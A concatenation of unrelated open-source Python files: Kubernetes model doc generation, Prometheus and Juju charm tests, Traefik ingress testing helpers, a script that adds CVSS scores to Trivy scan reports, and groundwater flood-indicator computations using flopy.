with docsdir.joinpath(f"{module}.md").open("w") as fw:
fw.write(docs_tmpl.render(models=models, module=module))
docs_tmpl_idx = get_template("models_docs_index.tmpl")
models_to_opts = defaultdict(list)
for module, models in modules.items():
for model in models:
models_to_opts[model.name].append(module)
for opts in models_to_opts.values():
opts.sort(key=sort_key, reverse=True)
with docsdir.joinpath(f"index.md").open("w") as fw:
fw.write(docs_tmpl_idx.render(version=version, models_to_opts=sorted(models_to_opts.items())))
def build_docs_index(docsdir: Path, version):
docs_tmpl = get_template("docs_index.tmpl")
with docsdir.joinpath(f"index.md").open("w") as fw:
fw.write(docs_tmpl.render(version=version))
def build_tests(testdir, modules):
with testdir.joinpath("test_models.py").open('w') as fw:
for module, models in modules.items():
fw.write(f"from lightkube.models import {module}\n")
def execute(fname, path: Path, testdir: Path, docsdir: Path, compiler_major: str):
with open(fname) as f:
sw = json.load(f)
spec_version = sw["info"]["version"].lstrip('v')
modules = defaultdict(list)
for name, defi in sw["definitions"].items():
model = Model(name, defi)
modules[model.module].append(model)
if not docsdir.exists():
docsdir.mkdir()
build_module(path, modules, spec_version, compiler_major)
build_docs(docsdir, modules, spec_version)
build_tests(testdir, modules)
build_docs_index(docsdir, spec_version)
```
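A quick, hedged usage sketch of the `sort_key` ordering documented above. It assumes the file is importable as `compile_models`, which depends on the actual package layout; the module names are invented examples.

```python
# Assumed import path; adjust to the real package layout.
from compile_models import sort_key

names = ["apps_v1alpha1", "apps_v1", "apps_v1beta2", "apps_v1beta1"]
# GA versions sort above beta, beta above alpha.
print(sorted(names, key=sort_key, reverse=True))
# -> ['apps_v1', 'apps_v1beta2', 'apps_v1beta1', 'apps_v1alpha1']
```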
#### File: lightkube-models/lightkube-generate/mkextension.py
```python
from markdown.inlinepatterns import InlineProcessor
from markdown.extensions import Extension
import xml.etree.ElementTree as etree
class ModelLinkProcessor(InlineProcessor):
def handleMatch(self, m, data):
module, classe = m.group(1), m.group(2)
code = etree.Element("code")
el = etree.Element("a")
el.text = (module or "") + classe
if module:
parts = module[:-1].split(".")
href = f"{'../'*len(parts)}{'/'.join(parts)}/index.html#{classe.lower()}"
else:
href = f"#{classe.lower()}"
el.set("href", href)
code.append(el)
return code, m.start(0), m.end(0)
class ModelLinkExtension(Extension):
def extendMarkdown(self, md):
PATTERN = r'``(?:List\[)?([a-z_0-9.]+)?([A-Z][a-z_0-9A-Z]+)\]?``'
mp = ModelLinkProcessor(PATTERN, md)
md.inlinePatterns.register(mp, 'class-link', 200)
md.registeredExtensions.append(ModelLinkExtension())
class K8SLinkProcessor(InlineProcessor):
def handleMatch(self, m, data):
el = etree.Element("a")
el.text = "More info"
el.set("href", m.group(1))
return el, m.start(0), m.end(0)
class K8SLinkExtension(Extension):
def extendMarkdown(self, md):
PATTERN = r'More\s+info:\s+(http\S+)'
mp = K8SLinkProcessor(PATTERN, md)
md.inlinePatterns.register(mp, 'k8s-link', 200)
md.registeredExtensions.append(K8SLinkExtension())
``` |
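The two extensions above rewrite ``module.Class`` references and trailing "More info:" URLs into links when rendering the generated docs. A hedged usage sketch follows; the module name and input text are assumptions.

```python
# Illustrative only; assumes the file above is importable as `mkextension`.
import markdown
from mkextension import ModelLinkExtension, K8SLinkExtension

text = "Standard object's metadata ``meta_v1.ObjectMeta``. More info: https://kubernetes.io/docs/"
html = markdown.markdown(text, extensions=[ModelLinkExtension(), K8SLinkExtension()])
print(html)
```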
{
"source": "jnsgruk/prometheus-operator",
"score": 2
} |
#### File: prometheus-operator/tests/test_charm.py
```python
import json
import unittest
from unittest.mock import patch
import yaml
from ops.testing import Harness
from charm import PrometheusCharm
MINIMAL_CONFIG = {"prometheus-image-path": "prom/prometheus"}
SAMPLE_ALERTING_CONFIG = {
"alertmanagers": [{"static_configs": [{"targets": ["192.168.0.1:9093"]}]}]
}
class TestCharm(unittest.TestCase):
def setUp(self):
self.harness = Harness(PrometheusCharm)
self.addCleanup(self.harness.cleanup)
self.harness.begin()
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
@patch("ops.testing._TestingModelBackend.network_get")
def test_grafana_is_provided_port_and_source(self, mock_net_get, *unused):
self.harness.update_config(MINIMAL_CONFIG)
ip = "1.1.1.1"
net_info = {"bind-addresses": [{"interface-name": "ens1", "addresses": [{"value": ip}]}]}
mock_net_get.return_value = net_info
rel_id = self.harness.add_relation("grafana-source", "grafana")
self.harness.add_relation_unit(rel_id, "grafana/0")
grafana_host = self.harness.get_relation_data(rel_id, self.harness.model.unit.name)[
"grafana_source_host"
]
self.assertEqual(grafana_host, "{}:{}".format(ip, "9090"))
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_default_cli_log_level_is_info(self, *unused):
self.harness.update_config(MINIMAL_CONFIG)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--log.level"), "info")
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_invalid_log_level_defaults_to_debug(self, *unused):
bad_log_config = MINIMAL_CONFIG.copy()
bad_log_config["log-level"] = "bad-level"
with self.assertLogs(level="ERROR") as logger:
self.harness.update_config(bad_log_config)
expected_logs = [
"ERROR:root:Invalid loglevel: bad-level given, "
"debug/info/warn/error/fatal allowed. "
"defaulting to DEBUG loglevel."
]
self.assertEqual(sorted(logger.output), expected_logs)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--log.level"), "debug")
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_valid_log_level_is_accepted(self, *unused):
valid_log_config = MINIMAL_CONFIG.copy()
valid_log_config["log-level"] = "warn"
self.harness.update_config(valid_log_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--log.level"), "warn")
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_ingress_relation_not_set(self, *unused):
self.harness.set_leader(True)
valid_log_config = MINIMAL_CONFIG.copy()
self.harness.update_config(valid_log_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertIsNone(cli_arg(plan, "--web.external-url"))
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_ingress_relation_set(self, *unused):
self.harness.set_leader(True)
self.harness.update_config(MINIMAL_CONFIG.copy())
rel_id = self.harness.add_relation("ingress", "ingress")
self.harness.add_relation_unit(rel_id, "ingress/0")
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(
cli_arg(plan, "--web.external-url"),
"http://prometheus-k8s:9090",
)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_metrics_wal_compression_is_not_enabled_by_default(self, *unused):
compress_config = MINIMAL_CONFIG.copy()
self.harness.update_config(compress_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.wal-compression"), None)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_metrics_wal_compression_can_be_enabled(self, *unused):
compress_config = MINIMAL_CONFIG.copy()
compress_config["metrics-wal-compression"] = True
self.harness.update_config(compress_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(
cli_arg(plan, "--storage.tsdb.wal-compression"),
"--storage.tsdb.wal-compression",
)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_valid_metrics_retention_times_can_be_set(self, *unused):
retention_time_config = MINIMAL_CONFIG.copy()
acceptable_units = ["y", "w", "d", "h", "m", "s"]
for unit in acceptable_units:
retention_time = "{}{}".format(1, unit)
retention_time_config["metrics-retention-time"] = retention_time
self.harness.update_config(retention_time_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.retention.time"), retention_time)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_invalid_metrics_retention_times_can_not_be_set(self, *unused):
retention_time_config = MINIMAL_CONFIG.copy()
# invalid unit
retention_time = "1x"
retention_time_config["metrics-retention-time"] = retention_time
self.harness.update_config(retention_time_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.retention.time"), None)
# invalid time value
retention_time = "0d"
retention_time_config["metrics-retention-time"] = retention_time
self.harness.update_config(retention_time_config)
plan = self.harness.get_container_pebble_plan("prometheus")
self.assertEqual(cli_arg(plan, "--storage.tsdb.retention.time"), None)
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_global_evaluation_interval_can_be_set(self, push, _):
evalint_config = MINIMAL_CONFIG.copy()
acceptable_units = ["y", "w", "d", "h", "m", "s"]
for unit in acceptable_units:
push.reset()
evalint_config["evaluation-interval"] = "{}{}".format(1, unit)
self.harness.update_config(evalint_config)
config = push.call_args[0]
gconfig = global_config(config)
self.assertEqual(gconfig["evaluation_interval"], evalint_config["evaluation-interval"])
@patch("ops.testing._TestingPebbleClient.remove_path")
@patch("ops.testing._TestingPebbleClient.push")
def test_default_scrape_config_is_always_set(self, push, _):
self.harness.update_config(MINIMAL_CONFIG)
config = push.call_args[0]
prometheus_scrape_config = scrape_config(config, "prometheus")
self.assertIsNotNone(prometheus_scrape_config, "No default config found")
@patch("prometheus_server.Prometheus.reload_configuration")
@patch("ops.testing._TestingPebbleClient.push")
@patch("ops.testing._TestingPebbleClient.remove_path")
def test_configuration_reload(self, push, trigger_configuration_reload, _):
self.harness.container_pebble_ready("prometheus")
push.assert_called()
self.harness.update_config(MINIMAL_CONFIG)
push.assert_called()
trigger_configuration_reload.assert_called()
label_config = MINIMAL_CONFIG.copy()
labels = {"name1": "value1", "name2": "value2"}
label_config["external-labels"] = json.dumps(labels)
self.harness.update_config(label_config)
trigger_configuration_reload.assert_called()
def alerting_config(config):
config_yaml = config[1]
config_dict = yaml.safe_load(config_yaml)
return config_dict.get("alerting")
def global_config(config):
config_yaml = config[1]
config_dict = yaml.safe_load(config_yaml)
return config_dict["global"]
def scrape_config(config, job_name):
config_yaml = config[1]
config_dict = yaml.safe_load(config_yaml)
scrape_configs = config_dict["scrape_configs"]
for config in scrape_configs:
if config["job_name"] == job_name:
return config
return None
def cli_arg(plan, cli_opt):
plan_dict = plan.to_dict()
args = plan_dict["services"]["prometheus"]["command"].split()
for arg in args:
opt_list = arg.split("=")
if len(opt_list) == 2 and opt_list[0] == cli_opt:
return opt_list[1]
if len(opt_list) == 1 and opt_list[0] == cli_opt:
return opt_list[0]
return None
``` |
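For readers skimming the helpers above, a self-contained sketch of what `cli_arg` extracts from a Pebble plan. `FakePlan` is a hypothetical stand-in with the same `to_dict()` shape the real plan object exposes, and the import assumes the test module above is importable as `test_charm`.

```python
# Hedged sketch; command string and import path are assumptions.
from test_charm import cli_arg

class FakePlan:
    """Hypothetical stand-in mirroring the to_dict() shape used above."""
    def to_dict(self):
        return {
            "services": {
                "prometheus": {
                    "command": "/bin/prometheus --log.level=info --storage.tsdb.wal-compression"
                }
            }
        }

plan = FakePlan()
print(cli_arg(plan, "--log.level"))                     # -> "info"
print(cli_arg(plan, "--storage.tsdb.wal-compression"))  # -> the bare flag itself
print(cli_arg(plan, "--web.external-url"))              # -> None
```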
{
"source": "jnsgruk/python-libjuju",
"score": 2
} |
#### File: tests/integration/test_juju.py
```python
import pytest
from juju.controller import Controller
from juju.juju import Juju
from .. import base
@base.bootstrapped
@pytest.mark.asyncio
async def test_get_controllers(event_loop):
async with base.CleanController() as controller:
j = Juju()
controllers = j.get_controllers()
assert isinstance(controllers, dict)
assert len(controllers) >= 1
assert controller.controller_name in controllers
cc = await j.get_controller(controller.controller_name)
assert isinstance(cc, Controller)
assert controller.connection().endpoint == cc.connection().endpoint
``` |
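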
{
"source": "jnsgruk/traefik-k8s-operator",
"score": 2
} |
#### File: v0/ingress_per_unit/__init__.py
```python
LIBID = "" # can't register a library until the charm is in the store 9_9
# Increment this major API version when introducing breaking changes
LIBAPI = 0
# Increment this PATCH version before using `charmcraft publish-lib` or reset
# to 0 if you are raising the major API version
LIBPATCH = 1
from . import testing
# flake8: noqa: E401,E402
from .ingress_per_unit import IngressPerUnitProvider, IngressPerUnitRequirer
```
#### File: v0/ingress_per_unit/testing.py
```python
from ops.model import Relation
from sborl.testing import MockRemoteRelationMixin
from .ingress_per_unit import (
IngressPerUnitProvider,
IngressPerUnitRequirer,
IngressRequest,
)
class MockIPUProvider(MockRemoteRelationMixin, IngressPerUnitProvider):
"""Class to help with unit testing ingress requirer charms.
Exactly the same as the normal IngressPerUnitProvider but, acts as if it's on
the remote side of any relation, and it automatically triggers events when
responses are sent.
"""
def get_request(self, relation: Relation):
"""Get the IngressRequest for the given Relation."""
# reflect the relation for the request so that it appears remote
return MockIngressRequest(self, relation)
class MockIngressRequest(IngressRequest):
"""Testing wrapper for an IngressRequest.
Exactly the same as the normal IngressRequest but acts as if it's on the
remote side of any relation, and it automatically triggers events when
responses are sent.
"""
@property
def app(self):
"""The remote application."""
return self._provider.harness.charm.app
@property
def units(self):
"""The remote units."""
return [self._provider.harness.charm.unit]
class MockIPURequirer(MockRemoteRelationMixin, IngressPerUnitRequirer):
"""Class to help with unit testing ingress provider charms.
Exactly the same as the normal IngressPerUnitRequirer, but acts as if it's on
the remote side of any relation, and it automatically triggers events when
requests are sent.
"""
@property
def urls(self):
"""The full ingress URLs to reach every unit.
May return an empty dict if the URLs aren't available yet.
"""
with self.remote_context(self.relation):
return super().urls
``` |
{
"source": "jnsgruk/trivy-cvss-tools",
"score": 3
} |
#### File: jnsgruk/trivy-cvss-tools/add-cvss.py
```python
import gzip
import json
import logging
import sys
from json.decoder import JSONDecodeError
# Get the filename of the CVSS JSON
cvss_filename = sys.argv[1]
# Get the filename of the trivy report from the second argument
report_filename = sys.argv[2]
def parse_file_or_quit(filename, gzipped=False):
try:
file = gzip.open(filename, "rb") if gzipped else open(filename, "r")
parsed = json.load(file)
file.close()
return parsed
except JSONDecodeError:
print(f"File: {filename} is not valid JSON! Exiting...",
file=sys.stderr)
sys.exit(1)
except FileNotFoundError:
# If file not found, bail out!
print(f"File: {filename} not found. Exiting...", file=sys.stderr)
sys.exit(1)
    except Exception:
        # Any other failure to open or parse the file: bail out!
print(
f"Error opening file: {filename}, is it the right format? Exiting...", file=sys.stderr)
sys.exit(1)
# Open and parse the files
report_json = parse_file_or_quit(report_filename)
cvss_json = parse_file_or_quit(cvss_filename, gzipped=True)
# Iterate over items in the trivy report
if report_json[0]["Vulnerabilities"] != None:
for item in report_json[0]["Vulnerabilities"]:
try:
# Get the CVE name to index the CVSS file
cve_name = item['VulnerabilityID']
# Add the CVSS info if available
item["CVSS"] = cvss_json[cve_name]
except KeyError:
# If not available set blank and move on
item["CVSS"] = {}
continue
# Dump the JSON to stdout
print(json.dumps(report_json, indent=2, ensure_ascii=False))
``` |
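The enrichment step above is a dictionary lookup keyed by `VulnerabilityID`. Here is a self-contained sketch with invented sample data, showing the shape of the result; a typical invocation of the script itself would be `python add-cvss.py cvss.json.gz report.json` (file names illustrative).

```python
import json

# Invented sample data shaped like the two input files.
cvss = {"CVE-2021-0001": {"nvd": {"V3Score": 7.5}}}
report = [{"Vulnerabilities": [
    {"VulnerabilityID": "CVE-2021-0001"},
    {"VulnerabilityID": "CVE-2021-9999"},   # not present in the CVSS data
]}]

for item in report[0]["Vulnerabilities"]:
    # Same logic as the script: attach CVSS info if known, else an empty dict.
    item["CVSS"] = cvss.get(item["VulnerabilityID"], {})

print(json.dumps(report, indent=2, ensure_ascii=False))
```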
{
"source": "Jnsll/Scripts4WaterFlowExp",
"score": 3
} |
#### File: Scripts4WaterFlowExp/src/helpers.py
```python
import flopy
import os
def importDataFromModel(modelname, dataToLoad):
"""
param dataToLoad : a list with the type of data to load from the model
example : ['upw', 'dis']
"""
mf1 = flopy.modflow.Modflow.load(modelname + '.nam', verbose=False,check=False, load_only=dataToLoad)
return mf1
def writeExecutionTimeInLogfile(path, modelname, duration):
with open(path + '/' + modelname + '_log.txt', 'w') as f:
f.write('Execution time (s) of ' + modelname +'\n')
f.write(str(duration))
def getPathToSimulationDirectoryFromModelname(modelname):
repo = "data"
return os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-2]), repo, modelname)
def getFloodDurationVTUFileNameFromModelnameAndLimitValueForFloodZone(modelname, upperLimitForFloodZone):
return "VTU_WaterTable_" + modelname + "_FloodDuration_" + str(upperLimitForFloodZone) + ".vtu"
def generate_model_name(chronicle, approx, rate, ref, site=None, time_param=0, geology_param=0, thickness_param=1, permeability_param=86.4, theta_param=0.1, step=None):
model_name = r'model_' + 'time_' + str(time_param) + '_geo_' + str(geology_param) + '_thick_' + str(thickness_param)
if geology_param == 0:
model_name = model_name + '_K_' + str(permeability_param) + '_Sy_' + str(theta_param)
if step is None:
model_name += "_Step" + str(1)
else:
model_name += "_Step" + str(step)
if site is not None:
model_name += "_site" + str(site)
if chronicle is not None:
model_name += "_Chronicle" + str(chronicle)
else:
model_name += "_Chronicle" + str(chronicle)
if (not ref):
model_name += "_Approx" + str(approx)
if approx==0:
model_name += "_Period" + str(rate)
elif approx==1:
model_name += "_RechThreshold" + str(rate)
return model_name
```
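A hedged usage sketch of `generate_model_name` with its default physical parameters; the argument values are invented and the module is assumed importable as `helpers`. The resulting name matches the pattern that `get_model_name` in watertab.py (later in this entry) hard-codes.

```python
# Assumes helpers.py above is importable as `helpers`; argument values invented.
from helpers import generate_model_name

name = generate_model_name(chronicle=0, approx=0, rate=182, ref=False, site=2)
print(name)
# -> model_time_0_geo_0_thick_1_K_86.4_Sy_0.1_Step1_site2_Chronicle0_Approx0_Period182
```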
#### File: src/old/Indicator_variantes.py
```python
def computeFloodsAndHErrorFromModelnamesByInterpolationWithoutSeaLvl(ref, modelname, site_number,timestep=1):
site_name = getSiteNameFromSiteNumber(site_number)
repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
# Get values for topo
topoRef = getSoilSurfaceValuesForASimulation(repoRef, ref)
topoSimu = getSoilSurfaceValuesForASimulation(repoSimu, modelname)
# Get heads values for simulation
simuHds = fpu.HeadFile(repoSimu + '/' + modelname + '.hds')
simuTimes = simuHds.get_times()
#simuKstpkper = simuHds.get_kstpkper()
refHds = fpu.HeadFile(repoRef + '/' + ref + '.hds')
    # Computation parameters
startTime = 0
endTime = 15340
dc = 0.3
alpha = float(1/3)
#endTime+1 - startTime
floods = {}
# hErrorGlobal = 0
smWs = 0
sherrorsup = 0
sea_lvl = getSeaLvl()
    # For each day
for day in range(startTime, endTime+1):
print(day)
        # Retrieve the head matrix from the reference simulation
refHead = refHds.get_data(kstpkper=(0, day))
nbPeriod = 0
while (simuTimes[nbPeriod] < day+1) and (nbPeriod < len(simuTimes)):
nbPeriod+=1
print("nbPeriod : " + str(nbPeriod))
        # Retrieve the simulation head matrix for the upper bound
print(simuTimes[nbPeriod], day+1)
if math.isclose(simuTimes[nbPeriod], day+1, rel_tol=1e-3): #simuTimes[nbPeriod] == day+1
print("condition ==")
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = altHeadSup
duree = int(simuTimes[nbPeriod])
pas = 0
else :
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = simuHds.get_data(kstpkper=(timestep-1, nbPeriod-1))
duree = int(simuTimes[nbPeriod] - simuTimes[nbPeriod-1])
pas = day - simuTimes[nbPeriod-1]
nbrowtot = altHeadInf.shape[1]
nbcoltot = altHeadInf.shape[2]
# onecol = [0]*nbcoltot
# flood = [onecol]
# for i in range(1, nbrowtot):
# flood.append(onecol)
flood = {}
for nrow in range(nbrowtot):
flood[nrow] = {}
for ncol in range(nbcoltot):
                ss = getNonDryCellHdsValue(altHeadInf, nrow, ncol, altHeadInf.shape[0]) # head value
se = getNonDryCellHdsValue(altHeadSup, nrow, ncol, altHeadInf.shape[0])
ajoutSimu = (se - ss) / duree
#print("ss:", ss)
                s = ss + (ajoutSimu * pas) # head value for the day under consideration
if math.isclose(s, sea_lvl, rel_tol=1e-3):
print("Sea zone with watertable level : ", s, "sea_lvl :", sea_lvl)
continue
                d = topoSimu[nrow][ncol] - s # depth: topographic elevation minus water table elevation
if d <= dc:
flood[nrow][ncol] = 1
#print("Cas flood = 1", day)
print("row : ", nrow, "col: ", ncol)
print("topo: ", topoSimu[nrow][ncol], "s: ", s)
                    r= getNonDryCellHdsValue(refHead, nrow, ncol,refHead.shape[0]) # head value for the reference
WsRef = getWeightToSurface(topoRef[nrow][ncol], r, dc, alpha)
WsSimu = getWeightToSurface(topoSimu[nrow][ncol], s, dc, alpha)
mWs = max(WsRef, WsSimu)
sherrorsup += (mWs * (r-s)**2)
smWs += mWs
floods[day] = flood
f = open(repoSimu + "/" + modelname + '_floods_pickle_dict_nosea.txt','wb')
pickle.dump(floods, f)
hErrorGlobal = math.sqrt(sherrorsup / smWs)
with open(repoSimu + "/" + modelname + '_Ref_' + ref + '_errorsresult_H_nosea.csv', 'w') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow(['H Error'])
writer.writerow([hErrorGlobal])
print("h error : " + str(hErrorGlobal))
return nbrowtot, nbcoltot
def computeOnlyFloodsFromModelnamesByInterpolation(ref, modelname, site_number,timestep=1):
site_name = getSiteNameFromSiteNumber(site_number)
#repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
# Get values for topo
#topoRef = getSoilSurfaceValuesForASimulation(repoRef, ref)
topoSimu = getSoilSurfaceValuesForASimulation(repoSimu, modelname)
# Get heads values for simulation
simuHds = fpu.HeadFile(repoSimu + '/' + modelname + '.hds')
simuTimes = simuHds.get_times()
#simuKstpkper = simuHds.get_kstpkper()
#refHds = fpu.HeadFile(repoRef + '/' + ref + '.hds')
    # Computation parameters
startTime = 0
endTime = 15340
dc = 0.3
#endTime+1 - startTime
floods = {}
# hErrorGlobal = 0
#sea_lvl = getSeaLvl()
    # For each day
for day in range(startTime, endTime+1):
print(day)
        # Retrieve the head matrix from the reference simulation
#refHead = refHds.get_data(kstpkper=(0, day))
nbPeriod = 0
while (simuTimes[nbPeriod] < day+1) and (nbPeriod < len(simuTimes)):
nbPeriod+=1
print("nbPeriod : " + str(nbPeriod))
        # Retrieve the simulation head matrix for the upper bound
if math.isclose(simuTimes[nbPeriod], day+1, rel_tol=1e-3): #simuTimes[nbPeriod] == day+1
print("condition ==")
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = altHeadSup
duree = int(simuTimes[nbPeriod])
pas = 0
else :
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = simuHds.get_data(kstpkper=(timestep-1, nbPeriod-1))
duree = int(simuTimes[nbPeriod] - simuTimes[nbPeriod-1])
pas = day - simuTimes[nbPeriod-1]
nbrowtot = altHeadInf.shape[1]
nbcoltot = altHeadInf.shape[2]
flood = {}
for nrow in range(nbrowtot):
flood[nrow] = {}
for ncol in range(nbcoltot):
                ss = getNonDryCellHdsValue(altHeadInf, nrow, ncol, altHeadInf.shape[0]) # head value
se = getNonDryCellHdsValue(altHeadSup, nrow, ncol, altHeadInf.shape[0])
ajoutSimu = (se - ss) / duree
                s = ss + (ajoutSimu * pas) # head value for the day under consideration
# if math.isclose(s, sea_lvl, rel_tol=1e-3):
# print("Sea zone with watertable level : ", s, "sea_lvl :", sea_lvl)
# continue
                d = topoSimu[nrow][ncol] - s # depth: topographic elevation minus water table elevation
if d <= dc:
flood[nrow][ncol] = 1
print("row : ", nrow, "col: ", ncol)
print("topo: ", topoSimu[nrow][ncol], "s: ", s)
floods[day] = flood
f = open(repoSimu + "/" + modelname + '_floods_pickle_dict_nosea.txt','wb')
pickle.dump(floods, f)
return nbrowtot, nbcoltot
def getWtAndTsAndTrForASimulationWithoutSeaLvl(modelname, site_number, tsmax, nbrow, nbcol):
site_name = getSiteNameFromSiteNumber(int(site_number))
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
file = open(repoSimu + '/' + modelname + "_floods_pickle_dict_nosea.txt", 'rb')
floods = pickle.load(file)
file.close()
weights = {}
ts = {}
tr = {}
for nrow in range(nbrow):
weights[nrow] = {}
ts[nrow] = {}
tr[nrow] = {}
for ncol in range(nbcol):
fSimu = False
sflood = []
eflood = []
fduration = 0
ssaturation = []
esaturation = []
sduration = 0
for day in sorted(floods): # Start at 1 because we did not take the init period into account
#print(day)
if (nrow in floods[day]) and (ncol in floods[day][nrow]) and (fSimu is False):
                    # Entering a saturation (flooded) period
fSimu = True
                    sflood.append(day) # Record the first day of the saturation period
if (len(sflood) != 1):
esaturation.append(day)
elif (nrow not in floods[day] or ncol not in floods[day][nrow]) and (fSimu):
                    # Leaving the saturation period
fSimu = False
                    eflood.append(day) # Record the last day of the saturation period
ssaturation.append(day)
#elif (floods[day][nrow][ncol]==1) and (fSimu is False):
elif (day == len(floods)-1) and (fSimu):
eflood.append(day)
# print("day : ",day,"\n")
# print("value of floods : ",floods[day][nrow][ncol])
# print("date start flood", len(sflood))
# print(sflood[-1])
print("nb row : ",nrow, "nb col : ", ncol)
m = 0
while m < len(eflood):
                # For every completed saturation period (one that has an end date),
                # accumulate its duration
fduration += (eflood[m]-sflood[m])
#print((eflood[m]-sflood[m]))
m+=1
            # Average the durations
if len(eflood) == 0:
fduration = 0
else:
fduration = fduration / len(eflood)
n = 0
while n < len(esaturation):
sduration += (esaturation[n] - ssaturation[n])
n+=1
if len(esaturation) == 0:
sduration = 0
else:
sduration = sduration / len(esaturation)
# Storing the values for the weights and duration of saturation periods
wt = getWeightToSaturationDuration(tsmax, fduration)
weights[nrow][ncol] = wt
ts[nrow][ncol] = fduration
tr[nrow][ncol] = sduration
fweights = open(repoSimu + "/" + modelname + '_weights_pickle_nosea.txt','wb')
pickle.dump(weights, fweights)
fweights.close()
fts = open(repoSimu + "/" + modelname + '_ts_pickle_nosea.txt', 'wb')
pickle.dump(ts, fts)
fts.close()
ftr = open(repoSimu + "/" + modelname + '_tr_pickle_nosea.txt', 'wb')
pickle.dump(tr, ftr)
fts.close()
return weights, ts, tr
def computeTsAndTrErrorsForASimulationWithFilesByMedian(ref, modelname, site_number, nbrow, nbcol, tsmax):
site_name = getSiteNameFromSiteNumber(int(site_number))
repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
# get for reference
wRef = open(repoRef + '/' + ref + "_weights_pickle.txt", 'rb')
weightsRef = pickle.load(wRef)
wRef.close()
tRef = open(repoRef + '/' + ref + "_ts_pickle.txt", 'rb')
tsRef = pickle.load(tRef)
tRef.close()
ttRef = open(repoRef + '/' + ref + "_tr_pickle.txt", 'rb')
trRef = pickle.load(ttRef)
ttRef.close()
wSimu = open(repoSimu + '/' + modelname + "_weights_pickle.txt", 'rb')
weightsSimu = pickle.load(wSimu)
wSimu.close()
tSimu = open(repoSimu + '/' + modelname + "_ts_pickle.txt", 'rb')
tsSimu = pickle.load(tSimu)
tSimu.close()
ttSimu = open(repoSimu + '/' + modelname + "_tr_pickle.txt", 'rb')
trSimu = pickle.load(ttSimu)
ttSimu.close()
#weightsSimu, tsSimu, trSimu = getWtAndTsAndTrForASimulation(modelname, site_number, tsmax, nbrow, nbcol)
smWt = 0
tserrorsup = []
trerrorsup = []
for nrow in range(nbrow):
for ncol in range(nbcol):
print("nb row : ",nrow, "nb col : ", ncol)
mWt = max(weightsRef[nrow][ncol], weightsSimu[nrow][ncol])
print("max poids : ",mWt)
smWt += mWt
if mWt == 1 and (tsRef[nrow][ncol]- tsSimu[nrow][ncol] != 0):
tserrorsup.append(abs(tsRef[nrow][ncol]- tsSimu[nrow][ncol]))
print("tsRef : ", tsRef[nrow][ncol], "tsSimu : ", tsSimu[nrow][ncol], "tsdiff :", (tsRef[nrow][ncol]- tsSimu[nrow][ncol]))
#print("tserrorsup",tserrorsup)
trerrorsup.append(abs(trRef[nrow][ncol]- trSimu[nrow][ncol]))
if smWt == 0:
tsErrorGlobal = 0
        trErrorGlobal = 0
else:
print("tserrorsup", tserrorsup, "smWt", smWt)
tsErrorGlobal = statistics.median(tserrorsup)
trErrorGlobal = statistics.median(trerrorsup)
with open(repoSimu + "/" + modelname + '_Ref_' + ref + '_errorsresult_TSAndTR_median_abs.csv', 'w') as output:
writer = csv.writer(output, delimiter=';')
writer.writerow(['TS Error', 'TR Error'])
writer.writerow([tsErrorGlobal, trErrorGlobal])
print("Ts Error value : ", tsErrorGlobal)
print("Tr Error value : ", trErrorGlobal)
return tsErrorGlobal,trErrorGlobal
def storeErrorValuesIntoCSVFile(ref, modelname, site_name, periodNumber, simulatedDuration, mea, mre, rmse):
simuRepo = getPathToSimulationDirectoryFromModelname(modelname, site_name)
if (periodNumber == 0):
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult.csv', 'w') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow(['Period Number', 'Simulated Time', 'MAE', 'MRE', 'RMSE'])
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
else:
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult.csv', 'a') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("-------------------------")
print("MEA value : ", mea)
print("MRE value : ", mre)
